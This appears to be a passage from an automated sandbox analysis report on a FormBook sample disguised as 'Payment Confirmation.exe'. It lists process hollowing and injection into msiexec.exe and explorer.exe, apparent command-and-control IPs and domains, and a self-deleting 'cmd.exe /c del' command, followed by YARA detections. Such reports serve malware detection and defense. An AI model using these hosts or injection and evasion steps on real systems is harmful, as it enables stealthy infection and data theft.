          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h]11_2_044E9100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9100 mov eax, dword ptr fs:[00000030h]11_2_044E9100
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0456A537 mov eax, dword ptr fs:[00000030h]11_2_0456A537
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h]11_2_04514D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h]11_2_04514D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04514D3B mov eax, dword ptr fs:[00000030h]11_2_04514D3B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451513A mov eax, dword ptr fs:[00000030h]11_2_0451513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451513A mov eax, dword ptr fs:[00000030h]11_2_0451513A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8D34 mov eax, dword ptr fs:[00000030h]11_2_045B8D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]11_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]11_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]11_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov eax, dword ptr fs:[00000030h]11_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120 mov ecx, dword ptr fs:[00000030h]11_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F3D34 mov eax, dword ptr fs:[00000030h]11_2_044F3D34
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EAD30 mov eax, dword ptr fs:[00000030h]11_2_044EAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04598DF1 mov eax, dword ptr fs:[00000030h]11_2_04598DF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h]11_2_044EB1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h]11_2_044EB1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h]11_2_044EB1E1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FD5E0 mov eax, dword ptr fs:[00000030h]11_2_044FD5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FD5E0 mov eax, dword ptr fs:[00000030h]11_2_044FD5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045741E8 mov eax, dword ptr fs:[00000030h]11_2_045741E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04512990 mov eax, dword ptr fs:[00000030h]11_2_04512990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]11_2_044E2D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]11_2_044E2D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]11_2_044E2D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]11_2_044E2D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]11_2_044E2D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451FD9B mov eax, dword ptr fs:[00000030h]11_2_0451FD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451FD9B mov eax, dword ptr fs:[00000030h]11_2_0451FD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450C182 mov eax, dword ptr fs:[00000030h]11_2_0450C182
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A185 mov eax, dword ptr fs:[00000030h]11_2_0451A185
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h]11_2_04511DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h]11_2_04511DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h]11_2_04511DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]11_2_045651BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]11_2_045651BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]11_2_045651BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]11_2_045651BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045135A1 mov eax, dword ptr fs:[00000030h]11_2_045135A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045669A6 mov eax, dword ptr fs:[00000030h]11_2_045669A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045161A0 mov eax, dword ptr fs:[00000030h]11_2_045161A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045161A0 mov eax, dword ptr fs:[00000030h]11_2_045161A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04574257 mov eax, dword ptr fs:[00000030h]11_2_04574257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]11_2_044E9240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]11_2_044E9240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]11_2_044E9240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]11_2_044E9240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]11_2_044F7E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]11_2_044F7E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]11_2_044F7E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]11_2_044F7E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]11_2_044F7E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]11_2_044F7E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F766D mov eax, dword ptr fs:[00000030h]11_2_044F766D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]11_2_0450AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]11_2_0450AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]11_2_0450AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]11_2_0450AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]11_2_0450AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452927A mov eax, dword ptr fs:[00000030h]11_2_0452927A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459B260 mov eax, dword ptr fs:[00000030h]11_2_0459B260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459B260 mov eax, dword ptr fs:[00000030h]11_2_0459B260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8A62 mov eax, dword ptr fs:[00000030h]11_2_045B8A62
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F8A0A mov eax, dword ptr fs:[00000030h]11_2_044F8A0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04503A1C mov eax, dword ptr fs:[00000030h]11_2_04503A1C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A61C mov eax, dword ptr fs:[00000030h]11_2_0451A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A61C mov eax, dword ptr fs:[00000030h]11_2_0451A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h]11_2_044EC600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h]11_2_044EC600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h]11_2_044EC600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04518E00 mov eax, dword ptr fs:[00000030h]11_2_04518E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EAA16 mov eax, dword ptr fs:[00000030h]11_2_044EAA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EAA16 mov eax, dword ptr fs:[00000030h]11_2_044EAA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459FE3F mov eax, dword ptr fs:[00000030h]11_2_0459FE3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EE620 mov eax, dword ptr fs:[00000030h]11_2_044EE620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8ED6 mov eax, dword ptr fs:[00000030h]11_2_045B8ED6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04528EC7 mov eax, dword ptr fs:[00000030h]11_2_04528EC7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459FEC0 mov eax, dword ptr fs:[00000030h]11_2_0459FEC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04512ACB mov eax, dword ptr fs:[00000030h]11_2_04512ACB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045136CC mov eax, dword ptr fs:[00000030h]11_2_045136CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F76E2 mov eax, dword ptr fs:[00000030h]11_2_044F76E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045116E0 mov ecx, dword ptr fs:[00000030h]11_2_045116E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04512AE4 mov eax, dword ptr fs:[00000030h]11_2_04512AE4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451D294 mov eax, dword ptr fs:[00000030h]11_2_0451D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451D294 mov eax, dword ptr fs:[00000030h]11_2_0451D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457FE87 mov eax, dword ptr fs:[00000030h]11_2_0457FE87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451FAB0 mov eax, dword ptr fs:[00000030h]11_2_0451FAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]11_2_044E52A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]11_2_044E52A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]11_2_044E52A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]11_2_044E52A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]11_2_044E52A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045646A7 mov eax, dword ptr fs:[00000030h]11_2_045646A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h]11_2_045B0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h]11_2_045B0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h]11_2_045B0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FAAB0 mov eax, dword ptr fs:[00000030h]11_2_044FAAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FAAB0 mov eax, dword ptr fs:[00000030h]11_2_044FAAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8B58 mov eax, dword ptr fs:[00000030h]11_2_045B8B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EDB40 mov eax, dword ptr fs:[00000030h]11_2_044EDB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FEF40 mov eax, dword ptr fs:[00000030h]11_2_044FEF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EF358 mov eax, dword ptr fs:[00000030h]11_2_044EF358
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04513B7A mov eax, dword ptr fs:[00000030h]11_2_04513B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04513B7A mov eax, dword ptr fs:[00000030h]11_2_04513B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EDB60 mov ecx, dword ptr fs:[00000030h]11_2_044EDB60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FFF60 mov eax, dword ptr fs:[00000030h]11_2_044FFF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8F6A mov eax, dword ptr fs:[00000030h]11_2_045B8F6A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A131B mov eax, dword ptr fs:[00000030h]11_2_045A131B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450F716 mov eax, dword ptr fs:[00000030h]11_2_0450F716
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457FF10 mov eax, dword ptr fs:[00000030h]11_2_0457FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457FF10 mov eax, dword ptr fs:[00000030h]11_2_0457FF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B070D mov eax, dword ptr fs:[00000030h]11_2_045B070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B070D mov eax, dword ptr fs:[00000030h]11_2_045B070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A70E mov eax, dword ptr fs:[00000030h]11_2_0451A70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A70E mov eax, dword ptr fs:[00000030h]11_2_0451A70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h]11_2_044E4F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h]11_2_044E4F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451E730 mov eax, dword ptr fs:[00000030h]11_2_0451E730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045653CA mov eax, dword ptr fs:[00000030h]11_2_045653CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045653CA mov eax, dword ptr fs:[00000030h]11_2_045653CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045237F5 mov eax, dword ptr fs:[00000030h]11_2_045237F5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]11_2_045103E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]11_2_045103E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]11_2_045103E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]11_2_045103E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]11_2_045103E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]11_2_045103E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h]11_2_044F1B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h]11_2_044F1B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451B390 mov eax, dword ptr fs:[00000030h]11_2_0451B390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]11_2_04567794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]11_2_04567794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]11_2_04567794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A138A mov eax, dword ptr fs:[00000030h]11_2_045A138A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459D380 mov ecx, dword ptr fs:[00000030h]11_2_0459D380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F8794 mov eax, dword ptr fs:[00000030h]11_2_044F8794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B5BA5 mov eax, dword ptr fs:[00000030h]11_2_045B5BA5
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00409B50 LdrLoadDll,4_2_00409B50
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10009B80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_10009B80

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.159.80 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.91.80.182 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.lumberjackguitarloops.com
          Source: C:\Windows\explorer.exeDomain query: www.elliotpioneer.com
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeDomain query: www.chinaopedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.anadolu.academy
          Source: C:\Windows\explorer.exeDomain query: www.playstarexch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.105.103.207 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.210.5.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.altitudebc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.147.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.unasolucioendesa.com
          Source: C:\Windows\explorer.exeDomain query: www.atp-cayenne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 82.98.134.154 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 9B0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory written: C:\Users\user\Desktop\Payment Confirmation.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.386546545.00000000008B8000.00000004.00000020.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100098FF cpuid 1_2_100098FF
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10012E30 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_10012E30
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_004030FB

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
